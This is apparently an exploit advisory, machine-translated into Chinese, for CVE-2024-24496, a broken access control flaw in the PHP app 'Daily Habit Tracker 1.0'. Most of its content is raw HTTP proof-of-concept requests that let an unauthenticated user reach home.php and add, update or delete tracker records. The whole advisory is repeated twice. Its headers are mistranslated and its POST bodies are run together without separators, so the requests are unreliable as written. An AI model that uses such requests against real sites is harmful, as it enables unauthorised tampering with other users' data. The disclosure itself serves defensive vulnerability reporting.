#利用标题:每日习惯跟踪器1.0-损坏的访问控制
#DATE: 2024年2月2日
#利用作者: yevhenii butenko
#供应商homepage: https://www.sourcecodester.com
#软件link: https://www.sourcecodester.com/php/...-using-php-and-php-and-mysql-source-code.html
#版本: 1.0
#测试在: Debian
#CVE : CVE-2024-24496
###损坏的访问控制:
损坏的访问控制是当Web应用程序不足限制用户访问特定资源和功能时会出现的安全漏洞。它涉及确保仅授权用户为他们的资源和功能授权。
###受影响的组件:
home.php,add-tracker.php,delete-tracker.php,update-tracker.php
### Description:
损坏的访问控制使未经身份验证的攻击者能够访问主页,并在不提供凭据的情况下创建,更新或删除跟踪器。
##概念证明:
###未经身份验证的访问主页
要绕过身份验证,请导航到'http://yourwebsitehere.com/home.php'。该应用程序未验证用户是否已进行身份验证或授权访问此页面。
###创建跟踪器作为未经身份验证的用户
要创建跟踪器,请使用以下请求:
````````
POST/HABIT-TRACKER/ENDPOINT/ADD-TRACKER.PHP http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenceded
内容长度: 108
Origin: http://localhost
DNT: 1
连接:关闭
Referer: http://localhost/habe-tracker/home.php
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
date=1443-01-02Day=noting oxercise=yespray=yesRead_book=yesVitamines=yeslaundry=yesalcohol=yesMeat=yesmeat=yesmeat=yes
````````
###更新跟踪器作为未经身份验证的用户
要更新跟踪器,请使用以下请求:
````````
POST/HABIT-TRACKER/ENDPOINT/UPDATE-TRACKER.PHP HTTP/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenceded
内容长度: 121
Origin: http://localhost
DNT: 1
连接:关闭
Referer: http://localhost/habe-tracker/home.php
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
tbl_tracker_id=5date=1443-01-02Day=notingercise=nopray=yesRead_book=novitams=yeslaundry=noalcohol=noalcohol=sumeat=sumeat=yes
````````
###删除跟踪器为未经验证的用户:
要删除跟踪器,请使用以下请求:
````````
get/habit-tracker/endpoint/delete-tracker.php?tracker=5 http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
DNT: 1
连接:关闭
Referer: http://localhost/habe-tracker/home.php
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
````````
##建议
使用此跟踪系统时,必须更新应用程序代码,以确保到位适当的访问控件。
#DATE: 2024年2月2日
#利用作者: yevhenii butenko
#供应商homepage: https://www.sourcecodester.com
#软件link: https://www.sourcecodester.com/php/...-using-php-and-php-and-mysql-source-code.html
#版本: 1.0
#测试在: Debian
#CVE : CVE-2024-24496
###损坏的访问控制:
损坏的访问控制是当Web应用程序不足限制用户访问特定资源和功能时会出现的安全漏洞。它涉及确保仅授权用户为他们的资源和功能授权。
###受影响的组件:
home.php,add-tracker.php,delete-tracker.php,update-tracker.php
### Description:
损坏的访问控制使未经身份验证的攻击者能够访问主页,并在不提供凭据的情况下创建,更新或删除跟踪器。
##概念证明:
###未经身份验证的访问主页
要绕过身份验证,请导航到'http://yourwebsitehere.com/home.php'。该应用程序未验证用户是否已进行身份验证或授权访问此页面。
###创建跟踪器作为未经身份验证的用户
要创建跟踪器,请使用以下请求:
````````
POST/HABIT-TRACKER/ENDPOINT/ADD-TRACKER.PHP http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenceded
内容长度: 108
Origin: http://localhost
DNT: 1
连接:关闭
Referer: http://localhost/habe-tracker/home.php
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
date=1443-01-02Day=noting oxercise=yespray=yesRead_book=yesVitamines=yeslaundry=yesalcohol=yesMeat=yesmeat=yesmeat=yes
````````
###更新跟踪器作为未经身份验证的用户
要更新跟踪器,请使用以下请求:
````````
POST/HABIT-TRACKER/ENDPOINT/UPDATE-TRACKER.PHP HTTP/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenceded
内容长度: 121
Origin: http://localhost
DNT: 1
连接:关闭
Referer: http://localhost/habe-tracker/home.php
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
tbl_tracker_id=5date=1443-01-02Day=notingercise=nopray=yesRead_book=novitams=yeslaundry=noalcohol=noalcohol=sumeat=sumeat=yes
````````
###删除跟踪器为未经验证的用户:
要删除跟踪器,请使用以下请求:
````````
get/habit-tracker/endpoint/delete-tracker.php?tracker=5 http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
DNT: 1
连接:关闭
Referer: http://localhost/habe-tracker/home.php
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
````````
##建议
使用此跟踪系统时,必须更新应用程序代码,以确保到位适当的访问控件。